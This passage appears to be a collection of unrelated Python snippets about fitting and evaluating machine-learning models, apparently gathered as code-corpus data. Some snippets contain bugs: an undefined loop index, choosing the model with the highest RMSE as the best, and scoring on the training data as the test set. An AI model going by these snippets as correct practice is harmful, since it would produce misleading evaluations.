\"/*.h5 > model_names.txt\"\r\n\r\n os.system(busqueda)\r\n\r\n X = np.load(directorio + '/Xtest.npy')\r\n diccio = np.load(directorio + '/feature_standarisation.npy').item()\r\n y = pd.read_csv(directorio + '/dbtest.csv')['target'].values\r\n\r\n X = (X - diccio['mean'])/diccio['std']\r\n x = np.reshape(X,(X.shape[0],X.shape[2]))\r\n \r\n with open('model_names.txt','r') as f:\r\n for line in f:\r\n modelo = models.load_model(line[:len(line)-1])\r\n nombre = line.split('/')[1]\r\n outpred = modelo.predict(x)\r\n prediction = outpred >= 0.5\r\n \r\n cost = -(np.dot(y,np.log10(outpred)) + \\\r\n np.dot((1-y),np.log10(1-outpred)))/y.shape[0]\r\n precision,recall,fscore,support = PRFS(y, prediction)\r\n \r\n with open(directorio + '/test_results.txt','a') as tr:\r\n tr.write(nombre + '\\n')\r\n tr.write('cost function: '+str(cost[0])+'\\n')\r\n tr.write('samples: '+str(support)+'\\n')\r\n tr.write('precision: '+str(np.round(precision*100,2))+'\\n')\r\n tr.write('recall: '+str(np.round(recall*100,2))+'\\n')\r\n tr.write('f1-score: '+str(np.round(fscore*100,2))+'\\n')\r\n tr.write('\\n')\r\n tr.close()\r\n \r\n print('The test of all trained models lasted ', round(time.time()-start,2),' s')\r\n os.system('rm model_names.txt')\r\n \r\n return", "def _evaluate_during_fit(self, test_loader, epoch):", "def OTU_table_ML(OTU_table,metadata,obj_col):\n for ele in OTU_table.index:\n #print(ele)\n X.append(df.loc[ele])\n Y.append(metadata[obj_col][ele])\n precisions = []\n for train_time in range(100): \n X,Y = shuffle(X,Y)\n sample_num = len(X)\n sep_num = int(0.8*sample_num)\n train_set = [X[:sep_num],Y[:sep_num]]\n test_set = [X[sep_num:],Y[sep_num:]]\n clf = svm.SVC(gamma='scale')\n clf.fit(train_set[0], train_set[1]) \n predict_result = clf.predict(test_set[0])\n count = 0\n for i in range(len(predict_result)):\n if predict_result[i] == test_set[1][i]:\n count += 1\n else:\n pass\n precisions.append(1.0*count/len(predict_result))\n print(np.mean(precisions))", "def get_perf(self) :\n self.train()\n\n prediction = self.clf.predict(self.df_test.drop(columns = 'up')[:-1])\n self.accuracy = accuracy_score(df_test['up'][length:].values, prediction)\n tn, fp, fn, tp = confusion_matrix(df_test['up'][length:].values, prediction).ravel()\n self.recall = tp/(tp+fn)\n self.specificity = tn / (tn+fp)\n\n\n self.df_true = self.df_true[self.length:]\n\n profit = 1\n mini = 1\n maxi = 1\n self.df_true['close'] = self.df_true['close'].map(lambda x : np.exp(x))\n for s in range(1,len(self.df_true)):\n if prediction[x-1] == 1 :\n result = ((self.df_true['close'].iloc[s] -self.df_true['close'].iloc[s-1]) / self.df_true['close'].iloc[s-1]) + 1\n profit = profit * result\n if result < mini :\n mini = result\n if maxi < result :\n maxi = result\n self.mini = mini\n self.maxi = maxi\n self.profit = profit", "def fit(self) -> None:\n start_time = time.time()\n # ---- START -----\n train_df = self.processed_train_df[self.processed_train_df[self.filter_col_name]].dropna()\n train_features = train_df[self.feature_list]\n for label, model in zip(self.label_list, self.models):\n model.fit(train_features, train_df[label])\n # ---- END -----\n end_time = time.time()\n print(\"Finished fitting : elasped time : \" + str(end_time - start_time))", "def test_predictor():", "def test_training(self):\n\t\tpass", "def testModel( self, classTest, classPred):", "def test_variational():\n # iris\n #pres = \"Test pour le data set Iris (facile, classique)\"\n #test_from_func_variational(pres, 15, 10, 3, True, Iris)\n\n # breast cancer\n pres = \"Test pour le data set Breast Cancer (facile, classique)\"\n test_from_func_variational(pres, 15, 10, 3, True, Breast_cancer)\n\n # digits\n # pres = \"Test pour le data set Digits (difficile, classique)\"\n # test_from_func(pres, 10, 10, 10, True, Digits, quantum_instance)\n\n # wine\n # pres = \"Test pour le data set Wine (moyen, classique)\"\n # test_from_func(pres, 15, 10, 5, True, Wine, quantum_instance)\n\n # gaussian\n pres = \"Test pour des données gaussiennes (moyen, classique)\"\n for _ in range(1):\n print(\"\\n\")\n print(\"New iteration\")\n test_from_func_variational(pres, 25, 10, 2, True, Gaussian)\n print(\"\\n\")\n\n # small adn strings\n pres = \"Test pour des séquences ADN courtes (difficile, classique)\"\n test_from_func_variational(pres, 10, 15, 14, True, Sequence)\n\n #Quantum data\n pres = \"Test pour des données générées par ordinateur quantique (facile, quantique)\"\n print(pres)\n _, samp_train, samp_test, labels = ad_hoc_data(15, 10, 2, 0.3, True)\n sample_m, sample_p = stock_get(20, 0.3)\n\n labels_me = [-1, 1]\n samp_train_me = {-1: np.array(sample_m[:15]), 1: np.array(sample_p[:15])}\n samp_test_me = {-1: np.array(sample_m[15:]), 1: np.array(sample_p[15:])}\n print(samp_train)\n print(samp_train_me)\n print(samp_test)\n print(samp_test_me)\n\n my_impl_variational(samp_train, samp_test, labels)\n print(\"Pour autres données quantiques\")\n my_impl_variational(samp_train_me, samp_test_me, labels_me)", "def test_fit(self):\n X = self.generate_X()\n task = mmRDTR()\n fit_result = task.fit(X)", "def test(x_test, m_labels_test, ques_test, alpha, checkpoint_name, model_name, output_file_name):\n bestModel = pick_model(model_name, alpha)\n bestModel.load_state_dict(torch.load(checkpoint_name))\n bestModel.eval()\n best_scores = {}\n\n with torch.no_grad():\n test_pred = bestModel(x_test, m_labels_test)\n prec, recall, f1, df_output = get_qald_metrics(test_pred, m_labels_test, ques_test, mode='test')\n df_output.to_csv(output_file_name)\n print(\"Test -- f1 is {} \".format(f1))\n print(\"Test -- prec, recall, f1\", prec, recall, f1)\n best_scores['precision'] = prec\n best_scores['recall'] = recall\n best_scores['f1'] = f1\n\n # for name, mod in bestModel.named_modules():\n # if type(mod) == nn.ModuleList:\n # for name1, mod1 in mod.named_modules():\n # if 'cdd' not in name1 and 'AND' not in name1:\n # if 'batch' in name1.lower():\n # continue\n # elif 'or_max' in name1.lower():\n # continue\n # elif 'and' in name1.lower():\n # print(name1, mod1.cdd())\n # elif 'or' in name1.lower():\n # print(name1, mod1.AND.cdd())\n # else:\n # if 'cdd' not in name and 'AND' not in name:\n # if 'batch' in name.lower():\n # continue\n # elif 'or_max' in name.lower():\n # continue\n # elif 'and' in name.lower():\n # print(name, mod.cdd())\n # elif 'or' in name.lower():\n # print(name, mod.AND.cdd())\n return test_pred, best_scores", "def train(self): \n start_time = time()\n\n # reset previous results\n self.best_result = pd.DataFrame()\n self.result = pd.DataFrame()\n\n # Generate dictionaries of all posible parameter permutations\n keys, values = zip(*self.params.items())\n self.permutations_dict = [dict(zip(keys, v)) for v in itertools.product(*values)] \n\n # Run through all models in parallel threads\n with Pool(self.thread_cnt) as p:\n result = p.map(self.analyze_model, self.permutations_dict)\n\n\n # wrap up results\n if self.classes_names: # acts as trigger for computation of cms\n for i, dic in enumerate(result):\n dic[\"id\"] = i\n self.cms = [(dic[\"id\"] ,dic.pop(\"cm\")) for dic in result]\n\n self.result = pd.DataFrame(result)\n self.best_result = self.result.iloc[self.result[\"score\"].argmax()] # store row with the best score\n self.best_result = self.result.iloc[self.result[\"f1_score\"].argmax()] # store row with the best score\n self.best_result = self.result.iloc[self.result[\"recall\"].argmax()] # store row with the best score\n self.best_result = self.result.iloc[self.result[\"precision\"].argmax()] # store row with the best score\n end_time = time()\n print(\"Finished evaluation\")\n print(\"Best parameteters found with:\", self.best_parameter_set())\n print(\"score=\", self.best_score())\n #print(\"f1_score=\", self.best_f1_score())\n #print(\"recall_score=\", self.best_recall_score())\n #print(\"precision_score=\", self.best_precision_score())\n print(\"Total evaluation time = {:.2f}s\".format(end_time-start_time))\n\n return self.best_parameter_set(), self.best_score()", "def test(self, plot=False):\n accuracy_list = []\n fobj_avg = self.load_stats()\n\n for ii in range(settings.PARS['maxIters']):\n model = self.load_model(ii)\n D1 = model['D']\n W1 = model['W']\n\n # classification\n tic = time.time()\n accuracy_list.append(self.classification(D1, W1)[1])\n toc = time.time()\n print(\n 'Final recognition rate for OnlineDL is : {} , objective function value: {}, time: {}'\n .format(accuracy_list[ii], fobj_avg[ii], toc-tic)\n )\n\n accuracy_list = np.asarray(accuracy_list)\n\n print('Best recognition rate for OnlineDL is {} at iteration {}'.format(\n accuracy_list.max(), accuracy_list.argmax()))\n\n if plot:\n # plot the objective function values for all iterations\n plt.clf()\n plt.plot(list(fobj_avg.keys()), list(fobj_avg.values()), 'mo--', linewidth=2)\n plt.xlabel('Iterations')\n plt.ylabel('Average objective function value')\n plt.xticks(list(range(0, 20)), list(range(1, 21)))\n plt.show()\n\n plt.clf()\n plt.plot(accuracy_list, 'rs--', linewidth=2)\n plt.xticks(list(range(0, 20)), list(range(1, 21)))\n plt.xlabel('Iterations')\n plt.ylabel('Accuracy')\n plt.show()", "def model(classifier, data):\n print(\"Beggining to test model\")\n train, test = cross_validation.train_test_split(data, test_size=.30)\n f,c = train[:,1:], train[:,0]\n classifier.fit(f,c,False)\n print(\"Score: \" + classifier.score(f,c))\n print(\"Finished testing model\")", "def train(X : list, y : list, model_name : str, data, mode,*vals,**args):\n # 훈련 결과 dictionary\n scores = {}\n\n # 훈련 모드 선택\n\n model = MODELS[mode][model_name]\n\n X_train, X_val, y_train, y_val = train_test_split(data[X], data[y], train_size=0.7)\n \n model.fit(X_train, y_train)\n\n scores['train'] = validation(model, X_train, y_train, mode)\n scores['validation'] = validation(model, X_val, y_val, mode)\n\n return scores", "def do_stats_model(x, y):\n Xx = sm.add_constant(x)\n sm_logit = sm.Logit(y, Xx)\n result = sm_logit.fit()\n print result.summary()\n result.pred_table()\n # linear model\n print \"linear regression model:\\n\"\n sm_linear = sm.OLS(y, Xx)\n result = sm_linear.fit()\n print result.summary()", "def test_modele(self, data):\n\t\tif not isinstance(data, ndarray):\n\t\t\traise TypeError(\"erreur data = {} n'est pas de type numpy.ndarray \".format(type(data)))\t\t\t\n\n\t\t#result = self.session.run(tf.argmax(self.variable_mnsit[\"y_conv\"],1), feed_dict={self.variable_mnsit[\"x\"]: [data]})\n\t\t[tableau_pourcent, result] = self.session.run([self.y_conv, tf.argmax(self.y_conv, 1)], feed_dict={self.x : [data], self.keep_prob: 1.0})\n\t\tprint (\"l'ordinateur voit un ... {}\", result)\n\t\tprint (\"tableaux: {}\".format(tableau_pourcent))", "def model_performance_comparison(self, yvar, prev_group, C_FP, C_FN):\n trn_bl_df = self.reweigh()\n # sample_weights = self.reweigh(bl_df=trn_bl_df)\n\n s_weights = trn_bl_df.instance_weights\n print(s_weights)\n\n trainset = trn_bl_df.convert_to_dataframe()[0]\n testset = trainset\n\n X = trainset.loc[:, trainset.columns != yvar]\n y = trainset[yvar]\n #X_test = testset.loc[:, trainset.columns != yvar]\n #y_test = testset[yvar]\n\n X_test = X\n y_test = y\n\n clf_ww = sklearn.linear_model.LogisticRegression(random_state=999).fit(X, y, sample_weight=s_weights)\n clf_wow = sklearn.linear_model.LogisticRegression(random_state=999).fit(X, y)\n\n output_probabilities_to_csv(model=clf_ww, x_test=X_test, path='probs_ww_withprvgroup.csv',priv_group_col=trainset[prev_group], actuals=y_test)\n output_probabilities_to_csv(model=clf_wow, x_test=X_test, path='probs_wow_withprvgroup.csv', priv_group_col=trainset[prev_group], actuals=y_test)\n\n print(\"------------------------------------------\")\n print(\"Accuracy of Vanila Logistic Model\")\n print(\"------------------------------------------\")\n print(\"Without Weights : \", round(clf_wow.score(X_test, y_test), 3))\n print(\"With Weights : \", round(clf_ww.score(X_test, y_test), 3))\n\n X_test_age1 = testset.loc[:, trainset.columns != yvar][testset[prev_group] == 1.0]\n y_test_age1 = testset[yvar][testset[prev_group] == 1.0]\n X_test_age0 = testset.loc[:, trainset.columns != yvar][testset[prev_group] == 0.0]\n y_test_age0 = testset[yvar][testset[prev_group] == 0.0]\n\n wow = round(abs(clf_wow.score(X_test_age0, y_test_age0) - clf_wow.score(X_test_age1, y_test_age1)), 3)\n ww = round(abs(clf_ww.score(X_test_age0, y_test_age0) - clf_ww.score(X_test_age1, y_test_age1)), 3)\n\n #output_probabilities_to_csv(model=clf_ww, x_test=X_test_age0, path='probs_unpriv_ww.csv')\n #output_probabilities_to_csv(model=clf_ww, x_test=X_test_age1, path='probs_priv_ww.csv')\n #output_probabilities_to_csv(model=clf_wow, x_test=X_test_age0, path='probs_unpriv_wow.csv')\n #output_probabilities_to_csv(model=clf_wow, x_test=X_test_age1, path='probs_priv_wow.csv')\n\n print(\"\")\n print(\"\")\n print(\"--------------------------------------------------------------\")\n print(\"Difference in accuracy between privileged and unprivileged\")\n print(\"--------------------------------------------------------------\")\n print(\"without weights : \", wow)\n print(\"with weights : \", ww)\n\n Ypredclf = clf_ww.predict(X_test)\n Ypredclf2 = clf_wow.predict(X_test)\n withw = confusion_matrix(y_test, Ypredclf)\n without = confusion_matrix(y_test, Ypredclf2)\n print(\"\")\n print(\"\")\n print(\"--------------------------------------------------------------\")\n print(\"Confusion Matrix\")\n print(\"--------------------------------------------------------------\")\n print(\"without weights\")\n print(without)\n print(\"\")\n print(\"\")\n print(\"with weights\")\n print(withw)\n\n a, b, c, d = without.ravel() #(tn, fp, fn, tp)\n a1, b1, c1, d1 = withw.ravel() #(tn, fp, fn, tp)\n\n withweights = b1 * C_FP + c1 * C_FN\n withoutweights = b * C_FP + c * C_FN\n\n print(\"\")\n print(\"\")\n print(\"cost with weights: \", withweights)\n print(\"cost without weights: \", withoutweights)\n print(\"Has cost decreased after reweighing?\", withweights < withoutweights)\n\n print('')\n print('SUMMARY TABLE')\n\n cost = fr.CostingFairness(input_dataframe=self.data,\n label_names=['credit'],\n protected_attribute_names=['Age_previliged'],\n trained_model=clf_ww)\n\n metrics_table = self.generate_pre_train_metrics_table(model_without_weights=clf_wow,\n model_with_weights=clf_ww,\n test_set=testset,\n target=yvar,\n privileged=prev_group,\n false_positive_cost=C_FP,\n false_negative_cost=C_FN)\n priv_diff_table = generate_privileged_diff(metrics_table)\n delta_table = generate_delta_table(metrics_table)\n costs_table = cost.return_cost_fairness_accuracy_optimised()\n\n # pdf = PDF()\n # pdf.add_page()\n # pdf.write_table_to_pdf(metrics_table)\n # pdf.write_table_to_pdf(priv_diff_table)\n # pdf.write_table_to_pdf(delta_table)\n # pdf.output('TEST01.pdf', 'F')\n\n print(\"\")\n print(\"What we see is interesting, after re-weighing the bias of the model has decreased significantly by {}%, \"\n \"with a very slight decrease in accuracy as shown earlier\".format(round((wow - ww) * 100)))\n\n return metrics_table, priv_diff_table, delta_table, costs_table", "def test_all_false(directorio = str(), database = 'red_cod-db.pkl', \r\n local_function = 'fij_2.0_25_diccio'):\r\n df = pd.read_pickle(database)\r\n collection = pd.read_csv(directorio + '/compounds_collection.csv')\r\n \r\n cifs = [i for i in collection['cif']]\r\n maxsites = np.max(collection['sitios'])\r\n \r\n df = df[df['sitios'] > 0][df['sitios'] <= maxsites].reset_index(drop=True)\r\n df = df.loc[~df['cif'].isin(cifs)].reset_index(drop=True)\r\n \r\n x, _, df = inout_creator(df=df)\r\n \r\n x = compute_quotients(X=x)\r\n x, df = append_local_functions(X = x,df=df)\r\n \r\n busqueda = \"ls \" + directorio + \"/*.h5 > model_names.txt\"\r\n os.system(busqueda)\r\n \r\n diccio = np.load(directorio + '/feature_standarisation.npy').item()\r\n \r\n X = (x - diccio['mean'])/diccio['std']\r\n x = np.reshape(X,(X.shape[0],X.shape[2]))\r\n \r\n with open('model_names.txt','r') as f:\r\n for line in f:\r\n modelo = models.load_model(line[:len(line)-1])\r\n nombre = line.split('/')[1]\r\n \r\n outpred = modelo.predict(x)\r\n prediction = outpred >= 0.5\r\n df['y_pred'] = np.ravel(prediction)\r\n \r\n with open(directorio+'/test_with_all_false.txt','a') as tr:\r\n tr.write(nombre + '\\n')\r\n \r\n for sitios in range(1, max(df['sitios']) + 1):\r\n \r\n acc = df[df['sitios'] == sitios][df['y_pred'] == False].shape[0]\r\n miniset = df[df['sitios'] == sitios].shape[0]\r\n percent = round(100*acc/miniset,2)\r\n \r\n \r\n tr.write('With '+ str(sitios) + ' sites:' + str(percent) +\\\r\n '(' + str(miniset) + ' samples)' + '\\n')\r\n tr.close()\r\n return", "def train_eval_model(model, model_name, X_train, y_train, X_test, y_test):\n\n model_predictions_train = model.predict(X_train) # Wyniki regresji dla zbioru treningowego\n model_mse_train = mean_squared_error(y_train, model_predictions_train) # MSE dla zbioru treningowego\n model_rmse_train = np.sqrt(model_mse_train) # RMSE dla zbioru treningowego\n model_predictions_test = model.predict(X_test)\n model_mse_test = mean_squared_error(y_test, model_predictions_test)\n model_rmse_test = np.sqrt(model_mse_test)\n # Kroswalidacja modelu\n model_scores = cross_val_score(model, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\n model_rmse_scores = np.sqrt(-model_scores)\n\n model_result = ResultDataRegressors(model_name, model, model_rmse_train, model_rmse_test, model_rmse_scores)\n return model_result", "def eval_perf_test(model, X_test, y_test):\n\n y_hat_test = model.predict(X_test)\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f'Test Mean Absolute Error: {test_mae:,.2f}')\n print(f'Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def train_full_model(X,y_train):\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(X)\n\n #chose model\n # model = RandomForestClassifier()\n model = GradientBoostingClassifier()\n\n\n #train\n print(\"train model\")\n tic = time.time()\n model.fit(x_train,y_train)\n tac = time.time()\n print(\"elapsed time\", tac-tic)\n\n #save data\n save_data(model,scaler,x_train,y_train)", "def _model_train(df,tag,test=False):\r\n ## start timer for runtime\r\n time_start = time.time()\r\n \r\n X,y,dates = engineer_features(df)\r\n\r\n if test:\r\n n_samples = int(np.round(0.3 * X.shape[0]))\r\n subset_indices = np.random.choice(np.arange(X.shape[0]),n_samples,\r\n replace=False).astype(int)\r\n mask = np.in1d(np.arange(y.size),subset_indices)\r\n y=y[mask]\r\n X=X[mask]\r\n dates=dates[mask]\r\n \r\n ## Perform a train-test split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25,\r\n shuffle=True, random_state=42)\r\n ## train a random forest model\r\n param_grid_rf = {\r\n 'rf__criterion': ['mse','mae'],\r\n 'rf__n_estimators': [50,100,250,500,1000],\r\n 'rf__max_depth': [5, 10, 20, 50],\r\n 'rf__min_samples_split': [2, 4, 8],\r\n 'rf__min_samples_leaf': [1, 2, 4]\r\n }\r\n pipe_rf = Pipeline(steps=[('rf', RandomForestRegressor())]) #Scaling not required for tree methods, robust to outliers\r\n grid_rf = RandomizedSearchCV(pipe_rf, param_distributions=param_grid_rf, cv=5, iid=False, n_jobs=-1)\r\n grid_rf.fit(X_train, y_train)\r\n y_pred = grid_rf.predict(X_test)\r\n eval_rmse_rf = round(np.sqrt(mean_squared_error(y_test,y_pred)),3)\r\n \r\n param_grid_mlp = {\r\n 'mlp__hidden_layer_sizes': [(30,),(30,10),(50,)],\r\n 'mlp__solver': [\"lbfgs\"],\r\n 'mlp__alpha': [0.01 ,0.001, 0.0001],\r\n 'mlp__max_iter': [500,1000],\r\n 'mlp__activation': ['relu','tanh']\r\n }\r\n pipe_mlp = Pipeline(steps=[('scaler', MinMaxScaler()),\r\n ('mlp', MLPRegressor())])\r\n grid_mlp = RandomizedSearchCV(pipe_mlp, param_distributions=param_grid_mlp, cv=5, iid=False, n_jobs=-1)\r\n grid_mlp.fit(X_train, y_train)\r\n y_pred = grid_mlp.predict(X_test)\r\n eval_rmse_mlp = round(np.sqrt(mean_squared_error(y_test,y_pred)),3)\r\n \r\n alg_dict={'rf':eval_rmse_rf,'mlp':eval_rmse_mlp}\r\n grid_dict={'rf':grid_rf,'mlp':grid_mlp}\r\n \r\n grid=grid_dict[max(alg_dict, key=alg_dict.get)]\r\n eval_rmse=max(eval_rmse_rf,eval_rmse_mlp)\r\n ## retrain using all data\r\n grid.fit(X, y)\r\n model_name = re.sub(\"\\.\",\"_\",str(MODEL_VERSION))\r\n if test:\r\n saved_model = os.path.join(MODEL_DIR,\r\n \"test-{}-{}.joblib\".format(tag,model_name))\r\n print(\"... saving test version of model: {}\".format(saved_model))\r\n else:\r\n saved_model = os.path.join(MODEL_DIR,\r\n \"sl-{}-{}.joblib\".format(tag,model_name))\r\n print(\"... saving model: {}\".format(saved_model))\r\n \r\n joblib.dump(grid,saved_model)\r\n\r\n m, s = divmod(time.time()-time_start, 60)\r\n h, m = divmod(m, 60)\r\n runtime = \"%03d:%02d:%02d\"%(h, m, s)\r\n\r\n ## update log\r\n msg='Model training - {0} model saved for country {1} after achieving accuracy {2}, versioned {3}. Training completed in {4}'.format(max(alg_dict, key=alg_dict.get),tag,eval_rmse,MODEL_VERSION,runtime)\r\n update_train_log(msg)", "def main():\n df = prepro_last()\n X, y = train_build(df)\n fit_store(X, y)", "def test_fit() -> None:\n mapie = MapieRegressor()\n mapie.fit(X_toy, y_toy)", "def _test(self,model, dataset):\n avg_loss = tfe.metrics.Mean('loss')\n accuracy = tfe.metrics.Accuracy('accuracy')\n\n for (images, labels) in tfe.Iterator(dataset):\n logits = model(images, training=False)\n avg_loss(self._loss(logits, labels))\n accuracy(\n tf.argmax(logits, axis=1, output_type=tf.int64),\n tf.cast(labels, tf.int64))\n print('Test set: Average loss: %.4f, Accuracy: %4f%%\\n' %\n (avg_loss.result(), 100 * accuracy.result()))\n with tf.contrib.summary.always_record_summaries():\n tf.contrib.summary.scalar('loss', avg_loss.result())\n tf.contrib.summary.scalar('accuracy', accuracy.result())", "def test(which, fitted_model_filename):\n click.echo(\"Mode: test.\")\n defaults = get_defaults()\n\n # bootstrap input\n fitted_model_path = os.path.join(defaults.OUTPUT.FITTED_MODELS_PATH, fitted_model_filename)\n new_options = [\"OUTPUT.FITTED_MODEL_PATH\", fitted_model_path]\n\n mode = \"{}_test\".format(which)\n boot_data = bootstrap(new_options, mode=mode)\n\n model = boot_data['model']\n X_test, y_test = boot_data['data']\n defaults = boot_data['defaults']\n\n eval_metrics = get_evaluation_metrics()\n # model = RandomForestClassifier(random_state=defaults.MISC.SEED, class_weight='balanced')\n\n # X_train, y_train = load_data(defaults, which='train')\n # scaler = StandardScaler()\n # numeric_cols = X_train.select_dtypes(include=np.number).columns.tolist()\n # X_train.loc[:, numeric_cols] = scaler.fit_transform(X_train[numeric_cols])\n\n # model.fit(X_train, y_train)\n\n test_results = test_performance(conf=defaults,\n model=model,\n X_test=X_test, y_test=y_test,\n eval_metrics=eval_metrics)\n results = pd.DataFrame(test_results.values(), index=test_results.keys(), columns=[\"test\"])\n\n results_filename = \"{}_results_{}.csv\".format(mode, fitted_model_filename.split(\".\")[0])\n results_path = os.path.join(defaults.OUTPUT.RESULTS_PATH, results_filename)\n results.to_csv(results_path)", "def fit(model, data, test_ids, exp_name, datasets):\n if model.model_type == 'torch':\n size = len(data[0])\n else:\n size = data[0].shape[0]\n \n train_ids = [i for i in range(size) if i not in test_ids]\n scaler = pka_scaler(data[1][train_ids])\n if model.data_type == 'descriptors':\n desc_scaler = StandardScaler()\n desc_scaler.fit(data[0][train_ids])\n data[0] = desc_scaler.transform(data[0])\n \n trained_model = train(model, train_ids, data, scaler, datasets)\n results = test(model, trained_model, test_ids, data, scaler)\n model.experiments.append({'name':exp_name,'model':trained_model, 'results':results, 'scaler':scaler})\n return results", "def fit():\n pass", "def test_evaluate():\n X_train, X_test, y_train, y_test = src.load()\n clf, score = src.train(X_train, y_train)\n test_score = src.evaluate(clf, X_test, y_test)\n assert isinstance(test_score, float)", "def test(self):\n with torch.no_grad():\n self.model.eval()\n p10_forecast, p10_forecast, p90_forecast, target = None, None, None, None\n\n t = time()\n for step, sample in enumerate(self.test_loader):\n\n # Hide future predictions from input vector, set to 0 (or 1) values where timestep > encoder_steps\n steps = self.cnf.all_params['num_encoder_steps']\n pred_len = sample['outputs'].shape[1]\n x = sample['inputs'].float().to(self.cnf.device)\n x[:, steps:, 0] = 1\n\n # Feed input to the model\n if self.cnf.all_params[\"model\"] == \"transformer\" or self.cnf.all_params[\"model\"] == \"grn_transformer\":\n\n # Auto-regressive prediction\n for i in range(pred_len):\n output = self.model.forward(x)\n x[:, steps + i, 0] = output[:, i, 1]\n output = self.model.forward(x)\n\n elif self.cnf.all_params[\"model\"] == \"tf_transformer\":\n output, _, _ = self.model.forward(x)\n else:\n raise NameError\n\n output = output.squeeze()\n y, y_pred = sample['outputs'].squeeze().float().to(self.cnf.device), output\n\n # Compute loss\n loss, _ = self.loss(y_pred, y)\n smape = symmetric_mean_absolute_percentage_error(output[:, :, 1].detach().cpu().numpy(),\n sample['outputs'][:, :, 0].detach().cpu().numpy())\n\n # De-Normalize to compute metrics\n target = unnormalize_tensor(self.data_formatter, y, sample['identifier'][0][0])\n p10_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 0], sample['identifier'][0][0])\n p50_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 1], sample['identifier'][0][0])\n p90_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 2], sample['identifier'][0][0])\n\n # Compute metrics\n self.test_losses['p10'].append(self.loss.numpy_normalised_quantile_loss(p10_forecast, target, 0.1))\n self.test_losses['p50'].append(self.loss.numpy_normalised_quantile_loss(p50_forecast, target, 0.5))\n self.test_losses['p90'].append(self.loss.numpy_normalised_quantile_loss(p90_forecast, target, 0.9))\n\n self.test_loss.append(loss.item())\n self.test_smape.append(smape)\n\n # Plot serie prediction\n p1, p2, p3, target = np.expand_dims(p10_forecast, axis=-1), np.expand_dims(p50_forecast, axis=-1), \\\n np.expand_dims(p90_forecast, axis=-1), np.expand_dims(target, axis=-1)\n p = np.concatenate((p1, p2, p3), axis=-1)\n plot_temporal_serie(p, target)\n\n # Log stuff\n for k in self.test_losses.keys():\n mean_test_loss = np.mean(self.test_losses[k])\n print(f'\\t● AVG {k} Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n\n # log log log\n mean_test_loss = np.mean(self.test_loss)\n mean_smape = np.mean(self.test_smape)\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n print(f'\\t● AVG SMAPE on TEST-set: {mean_smape:.6f} │ T: {time() - t:.2f} s')", "def test(self, test_iter, step, corpus_type, id):\n\n self.model.eval()\n stats = Statistics()\n if not os.path.exists(self.args.result_path):\n os.makedirs(self.args.result_path)\n if not os.path.exists(self.args.story_path):\n os.makedirs(self.args.story_path)\n can_path = self.args.result_path + corpus_type + '.' + id + '_step%d.candidate' % step\n gold_path = self.args.result_path + corpus_type + '.' + id + '_step%d.gold' % step\n story_path = self.args.story_path + corpus_type + '.' + id + '.story'\n with open(story_path, 'w') as save_story:\n with open(can_path, 'w') as save_pred:\n with open(gold_path, 'w') as save_gold:\n with torch.no_grad():\n for batch in test_iter:\n src = batch.src\n labels = batch.labels\n segs = batch.segs\n clss = batch.clss\n mask = batch.mask\n mask_cls = batch.mask_cls\n weight = batch.weight\n index = batch.index\n\n pred = []\n\n sents_vec, sent_scores, mask, cluster_weight = self.model(src, segs, clss, mask, mask_cls)\n loss = self.loss(sent_scores, labels.float())\n weight_loss = self.weight_loss(cluster_weight, weight)\n loss = (loss * mask.float()).sum()\n total_loss = loss + weight_loss * 10\n batch_stats = Statistics(float(total_loss.cpu().data.numpy()), len(labels))\n stats.update(batch_stats)\n\n sent_scores = sent_scores + mask.float()\n sent_scores = sent_scores.cpu().data.numpy()\n cluster_weight = cluster_weight.cpu().data.numpy()\n selected_ids = np.argsort(-sent_scores, 1)\n cluster_weight = np.argsort(cluster_weight)\n # print(selected_ids)\n # selected_ids = np.sort(selected_ids,1)\n cluster_num = len(cluster_weight)\n for i, idx in enumerate(selected_ids):\n rank = np.where(cluster_weight == i)[0][0]\n\n if rank <= max(cluster_num // 6, 6):\n for j in range(5):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num // 3, 10):\n for j in range(3):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num * 2 // 3, 15):\n for j in range(2):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n else:\n sen_ind = selected_ids[i][0]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n\n gold_summary = (batch.tgt_str[0].strip())\n pred.sort(key=lambda x: x[0])\n for i in range(len(pred)):\n save_story.write(pred[i][1].strip() + '\\n')\n if i == 0:\n save_pred.write(pred[i][1].strip())\n else:\n save_pred.write('<q> ' + pred[i][1].strip())\n save_gold.write(gold_summary)\n for sent in gold_summary.split('<q>'):\n save_story.write('@highlight {}\\n'.format(sent))\n if self.args.test_txt:\n return stats\n else:\n rouges = calculate_rouge(can_path, gold_path)\n logger.info('Rouges at step %d \\n%s' % (step, rouge_results_to_str(rouges)))\n self._report_step(0, step, valid_stats=stats)\n return stats, rouges", "def eval(self):\n self.train(mode=False)", "def learn(model: KW_Model,\n trainloader: DataLoader,\n testloader: DataLoader,\n optimizer: optim.Optimizer,\n nb_epoch: int,\n device: torch.device,\n eval_fn: Callable[[List[bool], List[Qid]], Dict[Qid, float]],\n mean_window: int = 50,\n entropy_lambda: float = 0.025,\n smt_lambda: float = 1.0,\n reinforce_lambda: float = 1.0,\n ) -> Tuple[nn.Module, Dict[str, List[torch.tensor]], Dict[str, List[torch.tensor]]]:\n 